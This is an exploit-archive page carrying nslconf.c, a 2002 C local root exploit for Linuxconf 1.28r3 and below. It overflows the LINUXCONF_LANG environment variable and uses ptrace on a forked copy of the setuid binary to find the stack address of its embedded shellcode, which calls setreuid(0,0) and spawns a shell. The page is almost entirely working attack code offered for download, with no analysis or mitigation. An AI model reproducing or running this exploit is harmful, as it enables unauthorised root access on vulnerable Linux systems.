what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nslconf.c

nslconf.c
Posted Sep 30, 2002
Authored by RaiSe | Site netsearch-ezine.com

Linuxconf v1.28r3 and below local exploit which uses the ptrace method to find the offset. Tested on Mandrake 8.0 and 8.2, and Redhat 7.2 and 7.3.

tags | exploit, local
systems | linux, redhat, mandrake
SHA-256 | 7c69399dd7f5a08de186e149072b4b0ffad0e4adecf6598bc7fb8d45d8cc6354

nslconf.c

Change Mirror Download
/* 
* Linuxconf <= 1.28r3 local xploit
* by RaiSe <raise@netsearch-ezine.com>
* http://www.netsearch-ezine.com
*
* Tested on:
* Mandrake 8.0
* Mandrake 8.2
* RedHat 7.3
*
* (run without args on directory
* with +w)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/user.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define PATHLCONF "/sbin/linuxconf"


unsigned long get_shell(void);

char shellcode[]= // by RaiSe
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc9\x51\xb8\x38"
"\x65\x73\x68\x66\x35\x56\x4a\x50\xb8\x65\x65\x62\x69\x66\x35"
"\x4a\x4a\x50\x89\xe3\x51\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b"
"\xcd\x80";


int main(void)
{
FILE *fp;
char buf[2056], buf2[2048];
unsigned long shell, *p;
int i;


printf("\n[ Linuxconf Local Xploit by RaiSe ]\n\n");
fflush(stdout);

sprintf(buf2, "%s.eng", shellcode);

if (mkdir(buf2, S_IRWXU))
{
fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, "
"delete it and run again.\n\n");
exit(-1);
}
else
sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode);

if ((fp = fopen(buf2, "w")) == NULL)
{
fprintf(stderr, "* Error at creat file, +w?\n\n");
exit(-1);
}
else
fclose(fp);

printf("* Directory + file created ..\n");
printf(" [dont forget to delete it ;)]\n");
fflush(stdout);

bzero(buf, sizeof(buf));
shell = get_shell();

p = (unsigned long *) buf;

for (i = 0; i < 2048 ; i+=4)
*p++ = shell;


setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf,1);
execl(PATHLCONF, "linuxconf", NULL);

exit(-1);

} /******* end of main() ******/


unsigned long get_shell(void)
{
unsigned long sc;
struct user_regs_struct regs;
int pid_vuln, n;


/* creamos un proceso */
if (!(pid_vuln = fork()))
{
char buf[2056];

sleep(2);
bzero(buf, sizeof(buf));
memset(buf, 0x41, 2048);

setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf, 1);
execl(PATHLCONF, "linuxconf", NULL);

fprintf(stderr, "Error: execl.\n");
exit(-1);
}
else
{

if (ptrace(PTRACE_ATTACH, pid_vuln))
{
fprintf(stderr, "Error: PTRACE_ATTACH.\n");
exit(-1);
}

waitpid(pid_vuln, NULL, 0);

printf("\n[* Looking at %%esp .. ]\n");
fflush(stdout);

if (ptrace(PTRACE_CONT, pid_vuln, 0, 0))
{
fprintf(stderr, "Error: PTRACE_CONT.\n");
exit(-1);
}

waitpid(pid_vuln, NULL, 0);

if (ptrace(PTRACE_GETREGS, pid_vuln, 0, &regs))
{
fprintf(stderr, "Error: PTRACE_GETREGS.\n");
exit(-1);
}

printf("[* Looking at: 0x%08x ]\n", (int) regs.esp);
fflush(stdout);

n = 0, sc = 0;

do
{
if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln,
(int)(regs.esp+(n++)), 0)) == -1)
{
fprintf(stderr, "Error: PTRACE_PEEKTEXT.\n");
exit(-1);
}

} while (sc != 0x90909090);

n--;
printf("[* Shellcode found at: 0x%08x ]\n", (int)(regs.esp + n));
fflush(stdout);

if(ptrace(PTRACE_KILL, pid_vuln, 0, 0))
{
fprintf(stderr, "Error: PTRACE_KILL.\n");
exit(-1);
}
else
{
waitpid(pid_vuln, NULL, 0);
printf("[* Xploting .. ]\n\n");
fflush(stdout);
sleep(1);
return((unsigned long)(regs.esp + n));
}
}

} /********* enf of get_shell() **********/


/* EOF */
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    33 Files
  • 8
    Feb 8th
    34 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close